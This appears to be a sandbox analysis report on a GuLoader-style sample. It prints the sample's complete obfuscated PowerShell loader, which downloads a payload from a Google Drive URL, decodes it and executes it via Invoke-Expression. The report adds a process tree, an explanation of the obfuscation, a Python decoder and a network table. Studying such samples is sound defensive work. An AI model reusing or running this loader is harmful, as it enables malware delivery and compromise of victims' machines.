A seS UncoeSa.torG,nnevSvieriModtacSileneSoupePInordoPfalziFaarenPlutotFirkaMBasilaTekstnTruckaTokregNonaneAll grAfbun]Jurid:Criss:Left.SPhi oeSulphc quaru reparPle eiKanontS dslyD utoP Presrhoodwo xpotFigeno Ke lcKinkloUd,krlsuper recep=Sandj Touna[Yle tNToxiceErerutC,eko.Un.omSPage.e polyc SynauChefprOverei E itt,ropay T lePDaglirA minometritoak,ioBifrocEfteroCastilCoctoT nliylep op,uspieS,est]Unhes:Stump: CresT SuprlDdemasAmpul1O era2Drgma ');$Pressefold=$Disney[0];$Godhed= (Annoteredes ' Roup$Un epG arlel Enogo An,ibPanopa ,ncoL Pyro:MachifFor aOSp,noR tikotObscuISimu,DWeaseS nebrU aptiHRaa,uyUr niR Fod.eUnthwtRetfr=Photon Dob eDampnWSkand- ultiOUnplobServijUn,veE D ukCOverstMu ti hovedsforsmy LittsStormTSwelle PedimBordt. gnvaN SemiEJuniot teat.FordeWTungtEGastrBGloriC oafeLChariITak teUndern Orvit');$Godhed+=$Nelumbian[1];Isoerucic ($Godhed);Isoerucic (Annoteredes 'S jfr$airmoFSy seoContrrAge etUdk aiBygnidBorgesOpva umisashLnsleyAf,elrKvikkeAnnegtEnerg.Rag aHLegleeSvansaFaunadSammeePaahir Demos eldr[Kiel $BilleCVurdeo Haric irtuo Frndn SecruGe omcTrideaUnhern Phys] La h=Gafsg$U fjeBBadlia IrlnyOvercaSter.r ogedHandll Withy Solu ');$Intellectualism=Annoteredes 'Tjene$anno FSikreoDendrrDat stTriviityra d Forts onopu Ha.khSabbayCellurTr,pheNon at Atom.BetinD Blyfo Ka.vw MastnOologlOneiroGyrita itsdSeksdFstraniListel,impaeHucks( Ra i$ ActuP Bo tr Ttnie F.dtsGryphssubs e ReexfNigrioParlalTauchdSigna, Myn $B.ndslStjereRoma,uBureakHu,reeIn ram la yiHyalidLa.gf)Sodom ';$leukemid=$Nelumbian[0];Isoerucic (Annoteredes ' Ba.c$DestiGPote LNaturo EfteBIndpiaTorumLRega :H llofStormoDrainR AnthMParaln F aeIKont NMicrogBonitsPaaviLguldsRSpinkeEductRSemi eCoenaNNosebsdagce= Seni(viburT P imeCivilSI,tertFritn- AtelPU dera artiTBrikkhHuman Pinde$S rubLGe,neEHumoruTurpuKDiscoeAssesMTeltli m.crd Fire)T.ldb ');while (!$Formningslrerens) {Isoerucic (Annoteredes ' urer$PhotogAn nylCuckooStngebFedtkaValerl ryob:ForsgP LskbhSceptaBromis Al.hcSuperuMix im lvpa= Pyro$Lamint Wes.r Sme,uS 
moneSkyld ') ;Isoerucic $Intellectualism;Isoerucic (Annoteredes 'H ndeSSouthtMil iaT aumrArb jt Kilo-CoronS.dbrylImpereStageeConcepOver Aph o4Ansla ');Isoerucic (Annoteredes ' ari$Ra esgT esplBokosoS raabUpstea Gr vlAmmon: UlykFPro.ooDetalrKittymFiscan intji Kantn SuccgLr insAabnilIrrevrChi,oe TillrDisc e Moton Ser.ssk.iv=Quoit( PranTPhysiePrimrsCompatHexad-syllaP Spr aPleoptslipch Didr Union$Runoll MateeameriuA,plikCasefeHanbum,laceiOpfeddSalut).roni ') ;Isoerucic (Annoteredes 'Unwon$KvindgU,clelweb eo KimbbInorgaProfelSk ve:AarsoOKulturKon ayK.kkezBadeloViandpTyngesDigiti andspseud= Rgfa$ ugegOssiclSamp oSog.ibF igiau gdolTrans:PaparJReskoiUnclam RevaiE.stes atio+Gospe+Tr ff%Teneb$ParenD PosiiHovedsUdstan Phy,eKaalhyTandf.Mns ec undeoHulsluBoj,rnCarnitUn er ') ;$Pressefold=$Disney[$Oryzopsis];}$Psychosarcous=285525;$Magdalenian158=28702;Isoerucic (Annoteredes 'G nne$Yanc gsyge lcovino S evbFa,cea Baanlbrats:AummbEUcen,m nittb BecriWoktriSvovld stal H,sbo=Withe anhaGRygereCent.tRecau-AppliCEffecoAn.renSvbeltVer ieSp,cinunr at ecom Dog,a$TrylllPrakseUnintu Flikk S.adeClonim AsiliNveskdStran ');Isoerucic (Annoteredes ' Nonl$vulgagTilhylSabazoNyh,dbBondea aarblSkovf:NoneqALystgdFa eleBi asnAbearo Archs,ithra Defor BldgcFreskoGastrmJ.velaudbedtFlaadaLesse Unin=S,nke Prisg[stemnSSviney TrinsCrinetPr dieGerikmKu he.Sne aCu stioSkyggnGonoev eodoeSka nrP lletMissi] Prna: inst:Stj,rFBaldarDebatoforgrm apitB tartaD,ndrsSauereFolke6Forsa4 iecrSSextut torkrplyw.iTruncnBlinkgPolst(,rumm$ForkrE Sy.pmMaalebpr triLegiti ennedSkema)Resf. 
');Isoerucic (Annoteredes 'erken$UnridgNonralKollao StatbResopaEpithl,etri:Def nG Cha r Vul aCochltTupiluRegnilVidneaCr tatHet riUdsatoSoljengastreReliar cinencurtaefrat Kon,o=Knald Urege[EntitS Dec.y ynges D emt ,edae legmmsauce.BarkaTSoppee idspx forstSelve.Un ecE OctonFlokdchekseoYo thdContriTwangn alvhgTairn]clear:Total:lis bA.onsuSPassaCFje,dI U paIReawo.OverfGCoiffeFrostt ,eerSS,ppltEs.ayrBlaaniPostunToldbgAntio(Filmm$J.rdsATitubdbru eeKlumpnForsko Unfos Ep naoutserNonnacSnertoDaarlmUdarbaUngent Pru aSek u)Unp i ');Isoerucic (Annoteredes ' Plas$ MiligO tbulCheckoFudgibMind.aDaubelBgetr:PriorBDis ru rivinBojegdJulemrdatara.astea Nae.dChargdUnplaeOrketnSkalp= bene$EpizoGUnh yrKarrjaRide tKejseuElectlbetydaHandst GnisiDek,aoSocianInvigeF.rcir Doc.n Nidee weat.BeskasFormouU derbAquaesTufsttVelurrJefali egmn GiangTr mm(Autol$Cri.sP.omersMark,yIndhac SavkhDiskooNoncrsDoseraOrangrFremmcSig.bo Phy,uHotelsBagpi,Fired$ChiasM ruiaSnoldgGallodUnsooaFormelFno ueTransnS vefiBrskuaVinklnMakvr1Karol5Henhq8Ungu )Brimm ');Isoerucic $Bundraadden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rougemontite.Syn && echo t"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front SpillFUdenoiGallarChokreloo,af ,usto ommexVot,r/Pa cr1Queen2Passa1Mi ea.Ritor0Alett ';$Coconucan=Annoteredes 'JacamuSurahsTilskeSo surUndew- romlaJvninGMultiEBack NIndoxTAmbur ';$Pressefold=Annoteredes ' HjtihGuldbtAsbolt Bu.kpCad,nsTilba: Kul / Forl/En modKart r GodtiTa kev Eu yeKari,. WashgCorncoForayoSobergVeg,tlZeoliePrela. 
Trerc machoTr.lim Omfo/Dematusch.zcMagis?DrunkeR.obbxBrackpOvipoo Engar,anoptRauli=Mike d LittoplkkewA.ayenomr.glAdditoaaregauntendTil e&Sgabei mkkedBloss=Nonel1SubatTMarokRAugmex,hlork Antr5,inguOHel byKwachQPe.toBDekomQLnindHHal fyKor eDmav pIToldpCUdrej7San tKRe reI Gram-OliviSKreisDNome M.fspnbTestpxPilotXUnd lcRadioESkibsfAp.livTelefHKogepBUn,ecp Nigh ';$Arkaiserings=Annoteredes ' inam>,aarr ';$Fabulous=Annoteredes ' SlidIAmusiEThelyxUngra ';$Panatrophy='Dobbeltheder';$Fermaten204 = Annoteredes 'E streStandcFamilh SkrsoH,dro Unsoi% LysbaKnav.p DilapUdsk dReincaledeltSlugwaKr ds%Weath\PolyiRIkendoc,okruKikkegFascieNegromElha oSemblnForortSmagsiGaveatoplsneTermi.Tale,SDatatyTndstnPetro Urkok&Va me&Borte storeCodaecModsvh elloSew d AugustConfi ';Isoerucic (Annoteredes ' Evan$EnstagTempel Ann oDuellbHalvta ,plyl Ing,:CompoNPrereeFas,nlEmendupori mInhumb Checi Teena Chern Meco= ogol(SecobcAnelsm Ov,rd Un m Grint/ AcalcVer i ndis$ Va,pF xletePooltrD ippmAluniaU hart JodleParapnVideo2 Mopa0Slibr4 Heir)Snaf, ');Isoerucic (Annoteredes 'Em ha$,onofgSplitlServio Sapob AarsaUd ntlGluti:VolupDOve siFarinsSj sknDestiePioneyAfsvk= ,rkf$ ,legPBiafrrChiroeWernasAnknysAutoreCicerfPhiloo oodl idrtd la,n.S,vefsSvbtepByggel MouniNosedtOpmar(Wh os$ U.coANikkor SommkSuge a ytteiMiljmsTonn eE nrirPr.ssizorrinTepi gA timsLayne)tr gl ');Isoerucic (Annoteredes 'Rette[ReadlN Geoneoph ht Bark. 
A seS UncoeSa.torG,nnevSvieriModtacSileneSoupePInordoPfalziFaarenPlutotFirkaMBasilaTekstnTruckaTokregNonaneAll grAfbun]Jurid:Criss:Left.SPhi oeSulphc quaru reparPle eiKanontS dslyD utoP Presrhoodwo xpotFigeno Ke lcKinkloUd,krlsuper recep=Sandj Touna[Yle tNToxiceErerutC,eko.Un.omSPage.e polyc SynauChefprOverei E itt,ropay T lePDaglirA minometritoak,ioBifrocEfteroCastilCoctoT nliylep op,uspieS,est]Unhes:Stump: CresT SuprlDdemasAmpul1O era2Drgma ');$Pressefold=$Disney[0];$Godhed= (Annoteredes ' Roup$Un epG arlel Enogo An,ibPanopa ,ncoL Pyro:MachifFor aOSp,noR tikotObscuISimu,DWeaseS nebrU aptiHRaa,uyUr niR Fod.eUnthwtRetfr=Photon Dob eDampnWSkand- ultiOUnplobServijUn,veE D ukCOverstMu ti hovedsforsmy LittsStormTSwelle PedimBordt. gnvaN SemiEJuniot teat.FordeWTungtEGastrBGloriC oafeLChariITak teUndern Orvit');$Godhed+=$Nelumbian[1];Isoerucic ($Godhed);Isoerucic (Annoteredes 'S jfr$airmoFSy seoContrrAge etUdk aiBygnidBorgesOpva umisashLnsleyAf,elrKvikkeAnnegtEnerg.Rag aHLegleeSvansaFaunadSammeePaahir Demos eldr[Kiel $BilleCVurdeo Haric irtuo Frndn SecruGe omcTrideaUnhern Phys] La h=Gafsg$U fjeBBadlia IrlnyOvercaSter.r ogedHandll Withy Solu ');$Intellectualism=Annoteredes 'Tjene$anno FSikreoDendrrDat stTriviityra d Forts onopu Ha.khSabbayCellurTr,pheNon at Atom.BetinD Blyfo Ka.vw MastnOologlOneiroGyrita itsdSeksdFstraniListel,impaeHucks( Ra i$ ActuP Bo tr Ttnie F.dtsGryphssubs e ReexfNigrioParlalTauchdSigna, Myn $B.ndslStjereRoma,uBureakHu,reeIn ram la yiHyalidLa.gf)Sodom ';$leukemid=$Nelumbian[0];Isoerucic (Annoteredes ' Ba.c$DestiGPote LNaturo EfteBIndpiaTorumLRega :H llofStormoDrainR AnthMParaln F aeIKont NMicrogBonitsPaaviLguldsRSpinkeEductRSemi eCoenaNNosebsdagce= Seni(viburT P imeCivilSI,tertFritn- AtelPU dera artiTBrikkhHuman Pinde$S rubLGe,neEHumoruTurpuKDiscoeAssesMTeltli m.crd Fire)T.ldb ');while (!$Formningslrerens) {Isoerucic (Annoteredes ' urer$PhotogAn nylCuckooStngebFedtkaValerl ryob:ForsgP LskbhSceptaBromis Al.hcSuperuMix im lvpa= Pyro$Lamint Wes.r Sme,uS 
moneSkyld ') ;Isoerucic $Intellectualism;Isoerucic (Annoteredes 'H ndeSSouthtMil iaT aumrArb jt Kilo-CoronS.dbrylImpereStageeConcepOver Aph o4Ansla ');Isoerucic (Annoteredes ' ari$Ra esgT esplBokosoS raabUpstea Gr vlAmmon: UlykFPro.ooDetalrKittymFiscan intji Kantn SuccgLr insAabnilIrrevrChi,oe TillrDisc e Moton Ser.ssk.iv=Quoit( PranTPhysiePrimrsCompatHexad-syllaP Spr aPleoptslipch Didr Union$Runoll MateeameriuA,plikCasefeHanbum,laceiOpfeddSalut).roni ') ;Isoerucic (Annoteredes 'Unwon$KvindgU,clelweb eo KimbbInorgaProfelSk ve:AarsoOKulturKon ayK.kkezBadeloViandpTyngesDigiti andspseud= Rgfa$ ugegOssiclSamp oSog.ibF igiau gdolTrans:PaparJReskoiUnclam RevaiE.stes atio+Gospe+Tr ff%Teneb$ParenD PosiiHovedsUdstan Phy,eKaalhyTandf.Mns ec undeoHulsluBoj,rnCarnitUn er ') ;$Pressefold=$Disney[$Oryzopsis];}$Psychosarcous=285525;$Magdalenian158=28702;Isoerucic (Annoteredes 'G nne$Yanc gsyge lcovino S evbFa,cea Baanlbrats:AummbEUcen,m nittb BecriWoktriSvovld stal H,sbo=Withe anhaGRygereCent.tRecau-AppliCEffecoAn.renSvbeltVer ieSp,cinunr at ecom Dog,a$TrylllPrakseUnintu Flikk S.adeClonim AsiliNveskdStran ');Isoerucic (Annoteredes ' Nonl$vulgagTilhylSabazoNyh,dbBondea aarblSkovf:NoneqALystgdFa eleBi asnAbearo Archs,ithra Defor BldgcFreskoGastrmJ.velaudbedtFlaadaLesse Unin=S,nke Prisg[stemnSSviney TrinsCrinetPr dieGerikmKu he.Sne aCu stioSkyggnGonoev eodoeSka nrP lletMissi] Prna: inst:Stj,rFBaldarDebatoforgrm apitB tartaD,ndrsSauereFolke6Forsa4 iecrSSextut torkrplyw.iTruncnBlinkgPolst(,rumm$ForkrE Sy.pmMaalebpr triLegiti ennedSkema)Resf. 
');Isoerucic (Annoteredes 'erken$UnridgNonralKollao StatbResopaEpithl,etri:Def nG Cha r Vul aCochltTupiluRegnilVidneaCr tatHet riUdsatoSoljengastreReliar cinencurtaefrat Kon,o=Knald Urege[EntitS Dec.y ynges D emt ,edae legmmsauce.BarkaTSoppee idspx forstSelve.Un ecE OctonFlokdchekseoYo thdContriTwangn alvhgTairn]clear:Total:lis bA.onsuSPassaCFje,dI U paIReawo.OverfGCoiffeFrostt ,eerSS,ppltEs.ayrBlaaniPostunToldbgAntio(Filmm$J.rdsATitubdbru eeKlumpnForsko Unfos Ep naoutserNonnacSnertoDaarlmUdarbaUngent Pru aSek u)Unp i ');Isoerucic (Annoteredes ' Plas$ MiligO tbulCheckoFudgibMind.aDaubelBgetr:PriorBDis ru rivinBojegdJulemrdatara.astea Nae.dChargdUnplaeOrketnSkalp= bene$EpizoGUnh yrKarrjaRide tKejseuElectlbetydaHandst GnisiDek,aoSocianInvigeF.rcir Doc.n Nidee weat.BeskasFormouU derbAquaesTufsttVelurrJefali egmn GiangTr mm(Autol$Cri.sP.omersMark,yIndhac SavkhDiskooNoncrsDoseraOrangrFremmcSig.bo Phy,uHotelsBagpi,Fired$ChiasM ruiaSnoldgGallodUnsooaFormelFno ueTransnS vefiBrskuaVinklnMakvr1Karol5Henhq8Ungu )Brimm ');Isoerucic $Bundraadden;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front SpillFUdenoiGallarChokreloo,af ,usto ommexVot,r/Pa cr1Queen2Passa1Mi ea.Ritor0Alett ';$Coconucan=Annoteredes 'JacamuSurahsTilskeSo surUndew- romlaJvninGMultiEBack NIndoxTAmbur ';$Pressefold=Annoteredes ' HjtihGuldbtAsbolt Bu.kpCad,nsTilba: Kul / Forl/En modKart r GodtiTa kev Eu yeKari,. WashgCorncoForayoSobergVeg,tlZeoliePrela. 
Trerc machoTr.lim Omfo/Dematusch.zcMagis?DrunkeR.obbxBrackpOvipoo Engar,anoptRauli=Mike d LittoplkkewA.ayenomr.glAdditoaaregauntendTil e&Sgabei mkkedBloss=Nonel1SubatTMarokRAugmex,hlork Antr5,inguOHel byKwachQPe.toBDekomQLnindHHal fyKor eDmav pIToldpCUdrej7San tKRe reI Gram-OliviSKreisDNome M.fspnbTestpxPilotXUnd lcRadioESkibsfAp.livTelefHKogepBUn,ecp Nigh ';$Arkaiserings=Annoteredes ' inam>,aarr ';$Fabulous=Annoteredes ' SlidIAmusiEThelyxUngra ';$Panatrophy='Dobbeltheder';$Fermaten204 = Annoteredes 'E streStandcFamilh SkrsoH,dro Unsoi% LysbaKnav.p DilapUdsk dReincaledeltSlugwaKr ds%Weath\PolyiRIkendoc,okruKikkegFascieNegromElha oSemblnForortSmagsiGaveatoplsneTermi.Tale,SDatatyTndstnPetro Urkok&Va me&Borte storeCodaecModsvh elloSew d AugustConfi ';Isoerucic (Annoteredes ' Evan$EnstagTempel Ann oDuellbHalvta ,plyl Ing,:CompoNPrereeFas,nlEmendupori mInhumb Checi Teena Chern Meco= ogol(SecobcAnelsm Ov,rd Un m Grint/ AcalcVer i ndis$ Va,pF xletePooltrD ippmAluniaU hart JodleParapnVideo2 Mopa0Slibr4 Heir)Snaf, ');Isoerucic (Annoteredes 'Em ha$,onofgSplitlServio Sapob AarsaUd ntlGluti:VolupDOve siFarinsSj sknDestiePioneyAfsvk= ,rkf$ ,legPBiafrrChiroeWernasAnknysAutoreCicerfPhiloo oodl idrtd la,n.S,vefsSvbtepByggel MouniNosedtOpmar(Wh os$ U.coANikkor SommkSuge a ytteiMiljmsTonn eE nrirPr.ssizorrinTepi gA timsLayne)tr gl ');Isoerucic (Annoteredes 'Rette[ReadlN Geoneoph ht Bark. 
A seS UncoeSa.torG,nnevSvieriModtacSileneSoupePInordoPfalziFaarenPlutotFirkaMBasilaTekstnTruckaTokregNonaneAll grAfbun]Jurid:Criss:Left.SPhi oeSulphc quaru reparPle eiKanontS dslyD utoP Presrhoodwo xpotFigeno Ke lcKinkloUd,krlsuper recep=Sandj Touna[Yle tNToxiceErerutC,eko.Un.omSPage.e polyc SynauChefprOverei E itt,ropay T lePDaglirA minometritoak,ioBifrocEfteroCastilCoctoT nliylep op,uspieS,est]Unhes:Stump: CresT SuprlDdemasAmpul1O era2Drgma ');$Pressefold=$Disney[0];$Godhed= (Annoteredes ' Roup$Un epG arlel Enogo An,ibPanopa ,ncoL Pyro:MachifFor aOSp,noR tikotObscuISimu,DWeaseS nebrU aptiHRaa,uyUr niR Fod.eUnthwtRetfr=Photon Dob eDampnWSkand- ultiOUnplobServijUn,veE D ukCOverstMu ti hovedsforsmy LittsStormTSwelle PedimBordt. gnvaN SemiEJuniot teat.FordeWTungtEGastrBGloriC oafeLChariITak teUndern Orvit');$Godhed+=$Nelumbian[1];Isoerucic ($Godhed);Isoerucic (Annoteredes 'S jfr$airmoFSy seoContrrAge etUdk aiBygnidBorgesOpva umisashLnsleyAf,elrKvikkeAnnegtEnerg.Rag aHLegleeSvansaFaunadSammeePaahir Demos eldr[Kiel $BilleCVurdeo Haric irtuo Frndn SecruGe omcTrideaUnhern Phys] La h=Gafsg$U fjeBBadlia IrlnyOvercaSter.r ogedHandll Withy Solu ');$Intellectualism=Annoteredes 'Tjene$anno FSikreoDendrrDat stTriviityra d Forts onopu Ha.khSabbayCellurTr,pheNon at Atom.BetinD Blyfo Ka.vw MastnOologlOneiroGyrita itsdSeksdFstraniListel,impaeHucks( Ra i$ ActuP Bo tr Ttnie F.dtsGryphssubs e ReexfNigrioParlalTauchdSigna, Myn $B.ndslStjereRoma,uBureakHu,reeIn ram la yiHyalidLa.gf)Sodom ';$leukemid=$Nelumbian[0];Isoerucic (Annoteredes ' Ba.c$DestiGPote LNaturo EfteBIndpiaTorumLRega :H llofStormoDrainR AnthMParaln F aeIKont NMicrogBonitsPaaviLguldsRSpinkeEductRSemi eCoenaNNosebsdagce= Seni(viburT P imeCivilSI,tertFritn- AtelPU dera artiTBrikkhHuman Pinde$S rubLGe,neEHumoruTurpuKDiscoeAssesMTeltli m.crd Fire)T.ldb ');while (!$Formningslrerens) {Isoerucic (Annoteredes ' urer$PhotogAn nylCuckooStngebFedtkaValerl ryob:ForsgP LskbhSceptaBromis Al.hcSuperuMix im lvpa= Pyro$Lamint Wes.r Sme,uS 
moneSkyld ') ;Isoerucic $Intellectualism;Isoerucic (Annoteredes 'H ndeSSouthtMil iaT aumrArb jt Kilo-CoronS.dbrylImpereStageeConcepOver Aph o4Ansla ');Isoerucic (Annoteredes ' ari$Ra esgT esplBokosoS raabUpstea Gr vlAmmon: UlykFPro.ooDetalrKittymFiscan intji Kantn SuccgLr insAabnilIrrevrChi,oe TillrDisc e Moton Ser.ssk.iv=Quoit( PranTPhysiePrimrsCompatHexad-syllaP Spr aPleoptslipch Didr Union$Runoll MateeameriuA,plikCasefeHanbum,laceiOpfeddSalut).roni ') ;Isoerucic (Annoteredes 'Unwon$KvindgU,clelweb eo KimbbInorgaProfelSk ve:AarsoOKulturKon ayK.kkezBadeloViandpTyngesDigiti andspseud= Rgfa$ ugegOssiclSamp oSog.ibF igiau gdolTrans:PaparJReskoiUnclam RevaiE.stes atio+Gospe+Tr ff%Teneb$ParenD PosiiHovedsUdstan Phy,eKaalhyTandf.Mns ec undeoHulsluBoj,rnCarnitUn er ') ;$Pressefold=$Disney[$Oryzopsis];}$Psychosarcous=285525;$Magdalenian158=28702;Isoerucic (Annoteredes 'G nne$Yanc gsyge lcovino S evbFa,cea Baanlbrats:AummbEUcen,m nittb BecriWoktriSvovld stal H,sbo=Withe anhaGRygereCent.tRecau-AppliCEffecoAn.renSvbeltVer ieSp,cinunr at ecom Dog,a$TrylllPrakseUnintu Flikk S.adeClonim AsiliNveskdStran ');Isoerucic (Annoteredes ' Nonl$vulgagTilhylSabazoNyh,dbBondea aarblSkovf:NoneqALystgdFa eleBi asnAbearo Archs,ithra Defor BldgcFreskoGastrmJ.velaudbedtFlaadaLesse Unin=S,nke Prisg[stemnSSviney TrinsCrinetPr dieGerikmKu he.Sne aCu stioSkyggnGonoev eodoeSka nrP lletMissi] Prna: inst:Stj,rFBaldarDebatoforgrm apitB tartaD,ndrsSauereFolke6Forsa4 iecrSSextut torkrplyw.iTruncnBlinkgPolst(,rumm$ForkrE Sy.pmMaalebpr triLegiti ennedSkema)Resf. 
');Isoerucic (Annoteredes 'erken$UnridgNonralKollao StatbResopaEpithl,etri:Def nG Cha r Vul aCochltTupiluRegnilVidneaCr tatHet riUdsatoSoljengastreReliar cinencurtaefrat Kon,o=Knald Urege[EntitS Dec.y ynges D emt ,edae legmmsauce.BarkaTSoppee idspx forstSelve.Un ecE OctonFlokdchekseoYo thdContriTwangn alvhgTairn]clear:Total:lis bA.onsuSPassaCFje,dI U paIReawo.OverfGCoiffeFrostt ,eerSS,ppltEs.ayrBlaaniPostunToldbgAntio(Filmm$J.rdsATitubdbru eeKlumpnForsko Unfos Ep naoutserNonnacSnertoDaarlmUdarbaUngent Pru aSek u)Unp i ');Isoerucic (Annoteredes ' Plas$ MiligO tbulCheckoFudgibMind.aDaubelBgetr:PriorBDis ru rivinBojegdJulemrdatara.astea Nae.dChargdUnplaeOrketnSkalp= bene$EpizoGUnh yrKarrjaRide tKejseuElectlbetydaHandst GnisiDek,aoSocianInvigeF.rcir Doc.n Nidee weat.BeskasFormouU derbAquaesTufsttVelurrJefali egmn GiangTr mm(Autol$Cri.sP.omersMark,yIndhac SavkhDiskooNoncrsDoseraOrangrFremmcSig.bo Phy,uHotelsBagpi,Fired$ChiasM ruiaSnoldgGallodUnsooaFormelFno ueTransnS vefiBrskuaVinklnMakvr1Karol5Henhq8Ungu )Brimm ');Isoerucic $Bundraadden;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rougemontite.Syn && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"
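The PowerShell stage reproduced in the process entries above (the same script runs in both detonations) uses GuLoader's usual string obfuscation: every literal is passed through Annoteredes, which keeps the character at index 5 and every sixth character after it, so each real character is preceded by five junk characters taken from Danish words. $Fabulous decodes to IEx, which makes Isoerucic a wrapper for `. IEx <decoded string>` (Invoke-Expression); $Arkaiserings decodes to ">"; and the cmd.exe child seen in the process tree, `echo %appdata%\Rougemontite.Syn && echo t`, is the decoded $Fermaten204, resolving the drop path that the Files section lists. The Python below is an added re-implementation of that decoder, not the sample's or the sandbox's code; obfuscate and SAMPLE_SCRIPT are constructed helpers for exercising it. One caveat for anyone decoding from this page rather than from the captured sample: the junk words here appear to have lost their non-ASCII letters (compare "Bundgrnsers", "Indkbs", "Medhrsforstrker" in the comments and variable names), which shifts the alignment of any literal whose junk contained æ, ø or å, so only literals with pure-ASCII junk, such as the two used below, decode cleanly from the page text.

```python
import re

# Added example: Python re-implementation of the string decoder used by the
# PowerShell stage in this report.  The original, as captured in the command
# line above, is:
#
#   $Rykkeres=$host.PrivateData; If ($Rykkeres) {$Samsender++;}
#   function Annoteredes($Medhrsforstrker){
#       $Bogus=$Medhrsforstrker.Length-$Samsender;
#       for($Filstrrelserne=5; $Filstrrelserne -lt $Bogus; $Filstrrelserne+=6){
#           $byganging+=$Medhrsforstrker[$Filstrrelserne]
#       }
#       $byganging
#   }
#
# Layout of every literal: five junk characters, one payload character,
# repeated, then five junk characters and a padding space.  $Samsender is 1 in
# the normal powershell.exe console host ($host.PrivateData is non-null), so the
# loop stops one index early and the padding space is never emitted.

STRIDE = 6          # 5 junk characters + 1 payload character
FIRST = 5           # index of the first payload character


def annoteredes(blob: str, samsender: int = 1) -> str:
    """Decode one obfuscated literal exactly as the PowerShell function does."""
    bogus = len(blob) - samsender
    return "".join(blob[i] for i in range(FIRST, bogus, STRIDE))


# Matches each `Annoteredes '<literal>'` call in captured script text.
CALL_RE = re.compile(r"Annoteredes\s+'([^']*)'")


def decode_calls(script: str, samsender: int = 1) -> list:
    """Decode every Annoteredes literal found in a script, in source order."""
    return [annoteredes(m.group(1), samsender) for m in CALL_RE.finditer(script)]


def obfuscate(plain: str, junk: str = "Xyzab") -> str:
    """Constructed helper (not from the sample): build a literal in the same
    layout so the decoder can be checked against known plaintext."""
    assert len(junk) == STRIDE - 1
    return "".join(junk + ch for ch in plain) + junk + " "


# Two literals copied verbatim from the command line above; their junk words
# contain no Danish special letters, so the page's copy decodes cleanly.
FABULOUS_LITERAL = " SlidIAmusiEThelyxUngra "        # $Fabulous      -> "IEx"
ARKAISERINGS_LITERAL = " inam>,aarr "                # $Arkaiserings  -> ">"

# Constructed mini-script in the sample's style (hypothetical URL), used as
# input for decode_calls.
SAMPLE_SCRIPT = (
    "$Fabulous=Annoteredes '" + FABULOUS_LITERAL + "';"
    "$Url=Annoteredes '" + obfuscate("hxxp://example.invalid/x.bin") + "';"
    "Isoerucic (Annoteredes '" + obfuscate("Start-Sleep 4") + "');"
)


if __name__ == "__main__":
    print(annoteredes(FABULOUS_LITERAL))                       # IEx
    print(annoteredes(ARKAISERINGS_LITERAL))                   # >
    for s in decode_calls(SAMPLE_SCRIPT):
        print(repr(s))
    # Without the host check ($Samsender stays 0) the padding space survives:
    print(repr(annoteredes(obfuscate("IEx"), samsender=0)))   # 'IEx '
```

To recover the full stage, paste the command line captured from the sample (not this page's copy) into decode_calls: each element of the result is one executed statement, and the $Pressefold literal is the download URL behind the drive.google.com / drive.usercontent.google.com traffic in the Network tables.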

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
